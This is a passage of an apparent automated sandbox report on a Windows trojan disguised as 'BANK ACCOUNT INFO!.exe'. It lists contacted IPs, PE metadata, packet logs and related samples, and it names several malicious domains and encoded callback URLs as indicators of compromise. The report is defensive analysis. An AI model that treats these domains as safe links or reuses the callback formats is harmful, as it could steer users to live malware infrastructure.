http://www.ablehead.net	explorer.exe, 00000002.00000003.295296507.00000000089CA000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.hoy.viajes/sbmh/	explorer.exe, 00000002.00000003.295296507.00000000089CA000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.elegancerealestategroup.com/sbmh/www.hoy.viajes	explorer.exe, 00000002.00000003.295296507.00000000089CA000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.meatslasvegas.com/sbmh/www.salon-massage-linit.com	explorer.exe, 00000002.00000003.295296507.00000000089CA000.00000004.00000001.sdmp	true	Avira URL Cloud: malware	unknown
http://www.firedoom.comReferer:	explorer.exe, 00000002.00000003.295296507.00000000089CA000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.magentos6.com	explorer.exe, 00000002.00000003.295296507.00000000089CA000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.parking500.com	explorer.exe, 00000002.00000003.295296507.00000000089CA000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.ablehead.net/sbmh/www.katrinarask.com	explorer.exe, 00000002.00000003.295296507.00000000089CA000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.carterandcone.coml	explorer.exe, 00000002.00000000.229950600.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.friendlyksa.com	explorer.exe, 00000002.00000003.295296507.00000000089CA000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.makgxoimisitzer.info/sbmh/www.downrangedynamics.com	explorer.exe, 00000002.00000003.295296507.00000000089CA000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designers/cabarga.htmlN	explorer.exe, 00000002.00000000.229950600.0000000008B46000.00000002.00000001.sdmp	false		high
http://crl.m	explorer.exe, 00000002.00000000.229795137.0000000008907000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.founder.com.cn/cn	explorer.exe, 00000002.00000000.229950600.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.wellnysdirect.com	explorer.exe, 00000002.00000003.295296507.00000000089CA000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designers/frere-jones.html	explorer.exe, 00000002.00000000.229950600.0000000008B46000.00000002.00000001.sdmp	false		high
http://www.wellnysdirect.comReferer:	explorer.exe, 00000002.00000003.295296507.00000000089CA000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.faculdadegraca.comReferer:	explorer.exe, 00000002.00000003.295296507.00000000089CA000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.friendlyksa.com/sbmh/www.ablehead.net	explorer.exe, 00000002.00000003.295296507.00000000089CA000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.salon-massage-linit.com/sbmh/	explorer.exe, 00000002.00000003.295296507.00000000089CA000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.faculdadegraca.com/sbmh/www.magentos6.com	explorer.exe, 00000002.00000003.295296507.00000000089CA000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.friendlyksa.comReferer:	explorer.exe, 00000002.00000003.295296507.00000000089CA000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.jiyu-kobo.co.jp/	explorer.exe, 00000002.00000000.229950600.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.meatslasvegas.com	explorer.exe, 00000002.00000003.295296507.00000000089CA000.00000004.00000001.sdmp	true	Avira URL Cloud: malware	unknown
http://www.fontbureau.com/designers8	explorer.exe, 00000002.00000000.229950600.0000000008B46000.00000002.00000001.sdmp	false		high
http://www.makgxoimisitzer.infoReferer:	explorer.exe, 00000002.00000003.295296507.00000000089CA000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.hoy.viajes	explorer.exe, 00000002.00000003.295296507.00000000089CA000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.firedoom.com/sbmh/www.endlessgirls.online	explorer.exe, 00000002.00000003.295296507.00000000089CA000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
198.49.23.141	unknown	United States	53831	SQUARESPACEUS	false
35.230.2.159	unknown	United States	15169	GOOGLEUS	false
107.22.223.163	unknown	United States	14618	AMAZON-AESUS	true

General Information

Joe Sandbox Version:	31.0.0 Red Diamond
Analysis ID:	321134
Start date:	20.11.2020
Start time:	11:59:58
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 8m 48s
Hypervisor based Inspection enabled:	false
Report type:	light
Sample file name:	BANK ACCOUNT INFO!.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	28
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@7/1@4/3
EGA Information:	Failed
HDC Information:	Successful, ratio: 18.8% (good quality ratio 17.1%) Quality average: 73.5% Quality standard deviation: 30.7%
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, UsoClient.exe, wuapihost.exe TCP Packets have been reduced to 100 Excluded IPs from analysis (whitelisted): 104.43.193.48, 52.255.188.83, 51.104.144.132, 23.210.248.85, 52.155.217.156, 20.54.26.129, 95.101.22.125, 95.101.22.134, 51.104.139.180 Excluded domains from analysis (whitelisted): displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, arc.msn.com.nsatc.net, fs.microsoft.com, db3p-ris-pf-prod-atm.trafficmanager.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, skypedataprdcolcus15.cloudapp.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, ris.api.iris.microsoft.com, umwatsonrouting.trafficmanager.net, skypedataprdcoleus17.cloudapp.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net

Simulations

Behavior and APIs

Time	Type	Description
12:00:48	API Interceptor	1x Sleep call for process: BANK ACCOUNT INFO!.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
198.49.23.141	Payment Advice - Advice Ref GLV823990339.exe	Get hash	malicious	Browse	www.floresereis.com/gyo3/?Ez=PS6J2QmalNJ2YJDjbe69AvUeFdUcpOy/3pEgziSDPBkUWsWS6mOmijOfudAWg7zfBEC1B5r2MQ==&lhud=TjfdU2S
	http://f69e.engage.squarespace-mail.com	Get hash	malicious	Browse	f69e.engage.squarespace-mail.com/
	dB7XQuemMc.exe	Get hash	malicious	Browse	www.missteenroyaluniverse.com/nt8e/?wfv=ZReo2Pt2Qe1/UCtjKFtXHq3RWUOi2Gm/wCbn0tZxqkEIYA02TnYAkFkYrty+KIrZCZ6r&Tj=yrIt
	hRVrTsMv25.exe	Get hash	malicious	Browse	www.qlifepharmacy.com/hko6/?XVJpkDH8=GNi/DpI/o0IU2mlIts+MFBAG9T0dMGL590B2ep5La5xhQGCr0BB5YDI5YioaKEegNoVx&V8-DC=02JL1VL0CDLPLTE0
	NzI1oP5E74.exe	Get hash	malicious	Browse	www.kayapallisgaard.com/igqu/?v6=+FdV/Kd4fGUiBuWYNlWEm7YK8cxavEbtySDgdYvfxIiidE6desXWnlu2B7HA/iyauFln7ZyoAg==&1b=V6O83JaPw
	PO.exe	Get hash	malicious	Browse	www.unusualdawg.com/9d1o/?1bm=QkXoOVVmg24y7wxEBap6bO8f6UGaNui7YjNJ7V3V8x8CyLlwzZoXh9kyUu+YoqOVbj3TZFChrA==&sZRd=pBiHDjuxCVPXGhYp
	KZ7qjnBlZF.exe	Get hash	malicious	Browse	www.haloheartdachshunds.com/sub/?ndndn4=RVlTij&AR5=XFWzbX0ToqWBjEsf26ufL7Xq5jBuxaIMiFZhysx3UIjI7XvmT/Bu5040hGTugKhDCWzPxOW3Cg==

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
ext-sq.squarespace.com	Purchase Order 40,7045.exe	Get hash	malicious	Browse	198.49.23.141
	Payment Advice - Advice Ref GLV823990339.exe	Get hash	malicious	Browse	198.49.23.141
	http://f69e.engage.squarespace-mail.com	Get hash	malicious	Browse	198.49.23.141
	dB7XQuemMc.exe	Get hash	malicious	Browse	198.49.23.141
	hRVrTsMv25.exe	Get hash	malicious	Browse	198.49.23.141
	v6k2UHU2xk.exe	Get hash	malicious	Browse	198.185.159.141
	NzI1oP5E74.exe	Get hash	malicious	Browse	198.49.23.141
	PO.exe	Get hash	malicious	Browse	198.49.23.141
	H4A2-423-EM154-302.exe	Get hash	malicious	Browse	198.185.159.141
	KZ7qjnBlZF.exe	Get hash	malicious	Browse	198.49.23.141
	scnn7676766.exe	Get hash	malicious	Browse	198.185.159.144
	price quote.exe	Get hash	malicious	Browse	198.185.159.145
	t64.exe	Get hash	malicious	Browse	198.185.159.144
	Preview_Annual.xlsb	Get hash	malicious	Browse	198.49.23.145
	Se adjunta un nuevo pedido.exe	Get hash	malicious	Browse	198.49.23.145
	wPthy7dafVcH94f.exe	Get hash	malicious	Browse	198.49.23.144
	54nwZp1aPg.exe	Get hash	malicious	Browse	198.49.23.144
	uiy3OAYIpt.exe	Get hash	malicious	Browse	198.185.159.144
	zisuzZpoW2.exe	Get hash	malicious	Browse	198.49.23.145
	ScanHP20.10.20.exe	Get hash	malicious	Browse	198.185.159.144

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
GOOGLEUS	http://global.krx.co.kr/board/GLB0205020100/bbs#view=649	Get hash	malicious	Browse	108.177.15.155
	Purchase Order 40,7045$.exe	Get hash	malicious	Browse	34.102.136.180
	invoice.exe	Get hash	malicious	Browse	34.102.136.180
	TR-D45.pdf.exe	Get hash	malicious	Browse	34.102.136.180
	knitted yarn documents.exe	Get hash	malicious	Browse	172.253.120.109
	86dXpRWnFG.exe	Get hash	malicious	Browse	34.102.136.180
	https://kimiyasanattools.com/outlook/latest-onedrive/microsoft.php	Get hash	malicious	Browse	172.217.16.130
	b0408bca49c87f9e54bce76565bc6518.exe	Get hash	malicious	Browse	74.125.34.46
	b2e3bd67d738988ca1bbed8d8b3e73fc.exe	Get hash	malicious	Browse	74.125.34.46
	ad14f913dc65be569277c8c76de608a4.exe	Get hash	malicious	Browse	74.125.34.46
	b2352353279664cc442f346015e86317.exe	Get hash	malicious	Browse	74.125.34.46
	ab1671011f681ff09ac0ffd70fc4b92b.exe	Get hash	malicious	Browse	74.125.34.46
	BetterPoints_v4.60.1_apkpure.com.apk	Get hash	malicious	Browse	216.58.212.163
	b0e7416dbf03a7359e909c5bd68ae6e1.exe	Get hash	malicious	Browse	74.125.34.46
	afaa3d5f10a2ea3c2813b3dd1dac8388.exe	Get hash	malicious	Browse	74.125.34.46
	afbce292dbb11bda3b89b5ff8270bd20.exe	Get hash	malicious	Browse	74.125.34.46
	aea80fb9d13561d7628b9d2f80a36ad0.exe	Get hash	malicious	Browse	74.125.34.46
	af8eb3450867384ca855f2f0d0d6ae94.exe	Get hash	malicious	Browse	74.125.34.46
	ae80b9b86323a612ce7a9c99f5cb65b4.exe	Get hash	malicious	Browse	74.125.34.46
	ae85c1f45fb26bf61dc41c2a93d29b76.exe	Get hash	malicious	Browse	74.125.34.46
SQUARESPACEUS	http://WWW.ALYSSA-J-MILANO.COM	Get hash	malicious	Browse	198.185.159.141
	Payment Advice - Advice Ref GLV823990339.exe	Get hash	malicious	Browse	198.49.23.141
	baf6b9fcec491619b45c1dd7db56ad3d.exe	Get hash	malicious	Browse	198.49.23.177
	http://f69e.engage.squarespace-mail.com	Get hash	malicious	Browse	198.49.23.141
	NEW PO.exe	Get hash	malicious	Browse	198.185.159.141
	p8LV1eVFyO.exe	Get hash	malicious	Browse	198.49.23.177
	dB7XQuemMc.exe	Get hash	malicious	Browse	198.49.23.141
	hRVrTsMv25.exe	Get hash	malicious	Browse	198.49.23.141
	qkN4OZWFG6.exe	Get hash	malicious	Browse	198.185.159.144
	kvdYhqN3Nh.exe	Get hash	malicious	Browse	198.185.159.144
	NzI1oP5E74.exe	Get hash	malicious	Browse	198.49.23.141
	IQtvZjIdhN.exe	Get hash	malicious	Browse	198.49.23.177
	PO.exe	Get hash	malicious	Browse	198.49.23.141
	148wWoi8vI.exe	Get hash	malicious	Browse	198.49.23.177
	H4A2-423-EM154-302.exe	Get hash	malicious	Browse	198.185.159.141
	KZ7qjnBlZF.exe	Get hash	malicious	Browse	198.49.23.141
	scnn7676766.exe	Get hash	malicious	Browse	198.185.159.144
	price quote.exe	Get hash	malicious	Browse	198.185.159.145
	t64.exe	Get hash	malicious	Browse	198.185.159.144
	Preview_Annual.xlsb	Get hash	malicious	Browse	198.49.23.145
AMAZON-AESUS	PO1.xlsx	Get hash	malicious	Browse	174.129.214.20
	https://rebrand.ly/zkp0y	Get hash	malicious	Browse	54.227.164.140
	AccountStatements.html	Get hash	malicious	Browse	18.209.113.162
	a7UZzCVWKO.exe	Get hash	malicious	Browse	54.204.14.42
	QKLQkaCe9M.exe	Get hash	malicious	Browse	50.19.252.36
	sAPuJAvs52.exe	Get hash	malicious	Browse	54.243.161.145
	JlgyVmPWZr.exe	Get hash	malicious	Browse	174.129.214.20
	EIUOzWW2JX.exe	Get hash	malicious	Browse	174.129.214.20
	RVAgYSH2qh.exe	Get hash	malicious	Browse	54.235.142.93
	yCyc4rN0u8.exe	Get hash	malicious	Browse	54.235.83.248
	9cXAnovmQX.exe	Get hash	malicious	Browse	54.225.66.103
	T2HDck1Mmy.exe	Get hash	malicious	Browse	54.235.142.93
	Purchase Order 40,7045$.exe	Get hash	malicious	Browse	52.71.133.130
	Payment Advice Note from 19.11.2020.exe	Get hash	malicious	Browse	23.21.126.66
	phy__1__31629__2649094674__1605642612.exe	Get hash	malicious	Browse	23.21.126.66
	BBVA confirming Aviso de pago Eur5780201120.exe	Get hash	malicious	Browse	50.19.252.36
	Ejgvvuwuu8.exe	Get hash	malicious	Browse	54.225.169.28
	PO N0.1500243224._PDF.exe	Get hash	malicious	Browse	54.204.14.42
	Avion Quotation Request.doc	Get hash	malicious	Browse	54.204.14.42
	zRHI9DJ0YKIPfBX.exe	Get hash	malicious	Browse	54.235.182.194

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\BANK ACCOUNT INFO!.exe.log Download File
Process:	C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1314
Entropy (8bit):	5.350128552078965
Encrypted:	false
SSDEEP:	24:MLU84jE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4sAmEw:MgvjHK5HKXE1qHiYHKhQnoPtHoxHhAHR
MD5:	1DC1A2DCC9EFAA84EABF4F6D6066565B
SHA1:	B7FCF805B6DD8DE815EA9BC089BD99F1E617F4E9
SHA-256:	28D63442C17BF19558655C88A635CB3C3FF1BAD1CCD9784090B9749A7E71FCEF
SHA-512:	95DD7E2AB0884A3EFD9E26033B337D1F97DDF9A8E9E9C4C32187DCD40622D8B1AC8CCDBA12A70A6B9075DF5E7F68DF2F8FBA4AB33DB4576BE9806B8E191802B7
Malicious:	true
Reputation:	high, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.818346959373367
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.80% Win32 Executable (generic) a (10002005/4) 49.75% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Windows Screen Saver (13104/52) 0.07% Generic Win/DOS Executable (2004/3) 0.01%
File name:	BANK ACCOUNT INFO!.exe
File size:	778240
MD5:	0bd3e9073a968fd6c10c3b163302c2c9
SHA1:	f0b948a18e960b1e5141471fe6e1cb4e85a2867d
SHA256:	dde122ac5a5a8eb786e335b3278dc5aae9cd3635c889fc4eb641a7a69123954d
SHA512:	79f55cb0b86371d2acbd52638ba4a19c0359c7b9b29bd12c7ea15237233b54903f227d725c847f6c4c28611e5df94303c525d9b12c01786815aced6ba476e06a
SSDEEP:	12288:D3iqBvfFgH3qLsxFR9hJQIRHHQe5XxJDHi9fra6/yIPXf2YwhOTKXP9upRSkqW7p:D3ig1I6oBJVRwIs/6qXeD8eXYmIKI
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......_..............P.............v.... ........@.. .......................@............@................................

File Icon


Icon Hash:	00828e8e8686b000

Static PE Info

General
Entrypoint:	0x4bf376
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics:	NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x5FB794B2 [Fri Nov 20 10:04:34 2020 UTC]
TLS Callbacks:
CLR (.Net) Version:	v4.0.30319
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xbf324	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xc0000	0x608	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xc2000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xbd37c	0xbd400	False	0.820010629954	data	7.82664888308	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc	0xc0000	0x608	0x800	False	0.33203125	data	3.43940208343	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xc2000	0xc	0x200	False	0.044921875	data	0.101910425663	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_VERSION	0xc0090	0x378	data
RT_MANIFEST	0xc0418	0x1ea	XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

Imports

DLL	Import
mscoree.dll	_CorExeMain

Version Infos

Description	Data
Translation	0x0000 0x04b0
LegalCopyright	Copyright 2009 GateWay Apply
Assembly Version	5.0.3.0
InternalName	tymo.exe
FileVersion	5.0.0.0
CompanyName	GateWay Apply
LegalTrademarks
Comments
ProductName	Qusar BDJob Management
ProductVersion	5.0.0.0
FileDescription	Qusar BDJob Management
OriginalFilename	tymo.exe

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 20, 2020 12:02:06.270860910 CET	49743	80	192.168.2.3	107.22.223.163
Nov 20, 2020 12:02:06.373423100 CET	80	49743	107.22.223.163	192.168.2.3
Nov 20, 2020 12:02:06.373555899 CET	49743	80	192.168.2.3	107.22.223.163
Nov 20, 2020 12:02:06.373770952 CET	49743	80	192.168.2.3	107.22.223.163
Nov 20, 2020 12:02:06.476159096 CET	80	49743	107.22.223.163	192.168.2.3
Nov 20, 2020 12:02:06.476324081 CET	80	49743	107.22.223.163	192.168.2.3
Nov 20, 2020 12:02:06.476356983 CET	80	49743	107.22.223.163	192.168.2.3
Nov 20, 2020 12:02:06.476578951 CET	49743	80	192.168.2.3	107.22.223.163
Nov 20, 2020 12:02:06.476632118 CET	49743	80	192.168.2.3	107.22.223.163
Nov 20, 2020 12:02:06.579108000 CET	80	49743	107.22.223.163	192.168.2.3
Nov 20, 2020 12:02:28.702881098 CET	49746	80	192.168.2.3	198.49.23.141
Nov 20, 2020 12:02:28.834309101 CET	80	49746	198.49.23.141	192.168.2.3
Nov 20, 2020 12:02:28.834438086 CET	49746	80	192.168.2.3	198.49.23.141
Nov 20, 2020 12:02:28.834657907 CET	49746	80	192.168.2.3	198.49.23.141
Nov 20, 2020 12:02:28.964940071 CET	80	49746	198.49.23.141	192.168.2.3
Nov 20, 2020 12:02:28.968111038 CET	80	49746	198.49.23.141	192.168.2.3
Nov 20, 2020 12:02:28.968164921 CET	80	49746	198.49.23.141	192.168.2.3
Nov 20, 2020 12:02:28.968202114 CET	80	49746	198.49.23.141	192.168.2.3
Nov 20, 2020 12:02:28.968238115 CET	80	49746	198.49.23.141	192.168.2.3
Nov 20, 2020 12:02:28.968275070 CET	80	49746	198.49.23.141	192.168.2.3
Nov 20, 2020 12:02:28.968319893 CET	80	49746	198.49.23.141	192.168.2.3
Nov 20, 2020 12:02:28.968346119 CET	49746	80	192.168.2.3	198.49.23.141
Nov 20, 2020 12:02:28.968362093 CET	80	49746	198.49.23.141	192.168.2.3
Nov 20, 2020 12:02:28.968399048 CET	80	49746	198.49.23.141	192.168.2.3
Nov 20, 2020 12:02:28.968436003 CET	80	49746	198.49.23.141	192.168.2.3
Nov 20, 2020 12:02:28.968456030 CET	49746	80	192.168.2.3	198.49.23.141
Nov 20, 2020 12:02:28.968473911 CET	80	49746	198.49.23.141	192.168.2.3
Nov 20, 2020 12:02:28.968525887 CET	49746	80	192.168.2.3	198.49.23.141
Nov 20, 2020 12:02:28.968592882 CET	49746	80	192.168.2.3	198.49.23.141
Nov 20, 2020 12:02:29.098779917 CET	80	49746	198.49.23.141	192.168.2.3
Nov 20, 2020 12:02:29.098851919 CET	80	49746	198.49.23.141	192.168.2.3
Nov 20, 2020 12:02:29.098896027 CET	80	49746	198.49.23.141	192.168.2.3
Nov 20, 2020 12:02:29.098932028 CET	80	49746	198.49.23.141	192.168.2.3
Nov 20, 2020 12:02:29.098968983 CET	80	49746	198.49.23.141	192.168.2.3
Nov 20, 2020 12:02:29.099005938 CET	80	49746	198.49.23.141	192.168.2.3
Nov 20, 2020 12:02:29.099041939 CET	80	49746	198.49.23.141	192.168.2.3
Nov 20, 2020 12:02:29.099070072 CET	49746	80	192.168.2.3	198.49.23.141
Nov 20, 2020 12:02:29.099078894 CET	80	49746	198.49.23.141	192.168.2.3
Nov 20, 2020 12:02:29.099107027 CET	49746	80	192.168.2.3	198.49.23.141
Nov 20, 2020 12:02:29.099112988 CET	49746	80	192.168.2.3	198.49.23.141
Nov 20, 2020 12:02:29.099117041 CET	80	49746	198.49.23.141	192.168.2.3
Nov 20, 2020 12:02:29.099164963 CET	80	49746	198.49.23.141	192.168.2.3
Nov 20, 2020 12:02:29.099169970 CET	49746	80	192.168.2.3	198.49.23.141
Nov 20, 2020 12:02:29.099206924 CET	80	49746	198.49.23.141	192.168.2.3
Nov 20, 2020 12:02:29.099236012 CET	49746	80	192.168.2.3	198.49.23.141
Nov 20, 2020 12:02:29.099241972 CET	80	49746	198.49.23.141	192.168.2.3
Nov 20, 2020 12:02:29.099281073 CET	80	49746	198.49.23.141	192.168.2.3
Nov 20, 2020 12:02:29.099318981 CET	80	49746	198.49.23.141	192.168.2.3
Nov 20, 2020 12:02:29.099325895 CET	49746	80	192.168.2.3	198.49.23.141
Nov 20, 2020 12:02:29.099354982 CET	80	49746	198.49.23.141	192.168.2.3
Nov 20, 2020 12:02:29.099391937 CET	80	49746	198.49.23.141	192.168.2.3
Nov 20, 2020 12:02:29.099399090 CET	49746	80	192.168.2.3	198.49.23.141
Nov 20, 2020 12:02:29.099430084 CET	80	49746	198.49.23.141	192.168.2.3
Nov 20, 2020 12:02:29.099467993 CET	49746	80	192.168.2.3	198.49.23.141
Nov 20, 2020 12:02:29.099478006 CET	80	49746	198.49.23.141	192.168.2.3
Nov 20, 2020 12:02:29.099519968 CET	80	49746	198.49.23.141	192.168.2.3
Nov 20, 2020 12:02:29.099556923 CET	80	49746	198.49.23.141	192.168.2.3
Nov 20, 2020 12:02:29.099556923 CET	49746	80	192.168.2.3	198.49.23.141
Nov 20, 2020 12:02:29.099627018 CET	49746	80	192.168.2.3	198.49.23.141
